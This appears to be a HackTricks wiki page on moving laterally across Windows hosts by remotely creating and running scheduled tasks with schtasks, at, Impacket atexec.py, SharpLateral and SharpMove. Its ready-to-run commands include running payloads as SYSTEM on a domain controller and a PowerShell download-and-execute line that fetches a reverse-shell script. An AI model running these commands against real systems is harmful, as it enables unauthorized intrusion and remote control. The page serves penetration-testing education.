atexec.md (3688B)
1 --- 2 title: "AtExec / SchtasksExec" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/lateral-movement/atexec.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/lateral-movement/atexec.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # AtExec / SchtasksExec 14 15 ## How it works 16 17 With administrative access to a Windows host, an operator can create and start a scheduled task remotely. The `/S` option selects the remote host, `/U` and `/P` supply credentials for creating the task when needed, and `/RU` selects the account under which the task runs. The command referenced by `/TR` must exist on the remote system.<sup>[[1]](#references)</sup> 18 19 The older `at` command can also schedule a command on a remote host when the Schedule service is running. It executes scheduled jobs under the service account, which is commonly `SYSTEM`:<sup>[[5]](#references)</sup> 20 21 ```batch 22 at \\victim 23:00 shutdown -r 23 ``` 24 25 Create the task and then start it: 26 27 ```bash 28 schtasks /create /S <VICTIM> /TN <TASK_NAME> /TR C:\path\executable.exe /SC ONCE /ST 23:00 /RU SYSTEM 29 schtasks /run /S <VICTIM> /TN <TASK_NAME> 30 ``` 31 32 For example: 33 34 ```bash 35 schtasks /create /S dcorp-dc.domain.local /SC ONCE /ST 23:00 /RU SYSTEM /TN MyNewTask /TR C:\Windows\Temp\payload.exe 36 schtasks /run /S dcorp-dc.domain.local /TN MyNewTask 37 ``` 38 39 For a recurring weekly task, use a valid weekly schedule and specify the day explicitly: 40 41 ```batch 42 schtasks /create /S dcorp-dc.domain.local /SC WEEKLY /D MON /ST 23:00 /RU SYSTEM /TN MyWeeklyTask /TR C:\Windows\Temp\payload.exe 43 schtasks /run /S dcorp-dc.domain.local /TN MyWeeklyTask 44 ``` 45 46 A task action can also invoke PowerShell directly. The following lab example downloads and runs a script; host the payload only on infrastructure authorized for the assessment: 47 48 ```batch 49 schtasks /create /S dcorp-dc.domain.local /SC ONCE /ST 23:00 /RU SYSTEM /TN MyNewTask /TR "powershell.exe -NoProfile -Command \"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/InvokePowerShellTcp.ps1')\"" 50 schtasks /run /S dcorp-dc.domain.local /TN MyNewTask 51 ``` 52 53 Impacket's `atexec.py` automates remote command execution through the Task Scheduler service and accepts password, NTLM-hash, or Kerberos authentication.<sup>[[2]](#references)</sup> 54 55 ```bash 56 atexec.py 'DOMAIN'/'USER':'PASSWORD'@'target_ip' whoami 57 ``` 58 59 SharpLateral provides a scheduled-task execution method:<sup>[[3]](#references)</sup> 60 61 ```bash 62 SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName 63 ``` 64 65 SharpMove provides another Task Scheduler implementation:<sup>[[4]](#references)</sup> 66 67 ```bash 68 SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password 69 ``` 70 71 More information about the [**use of schtasks with silver tickets here**](/hacktricks/windows-hardening/active-directory-methodology/silver-ticket#host). 72 73 Remove testing tasks after use: 74 75 ```bash 76 schtasks /delete /S <VICTIM> /TN <TASK_NAME> /F 77 ``` 78 79 ## References 80 81 - [1] [Microsoft Learn - schtasks create](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create) 82 - [2] [Fortra Impacket - atexec.py](https://github.com/fortra/impacket/blob/master/examples/atexec.py) 83 - [3] [SharpLateral](https://github.com/mertdas/SharpLateral) 84 - [4] [SharpMove](https://github.com/0xthirteen/SharpMove) 85 - [5] [Microsoft Learn - `at` command](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/at)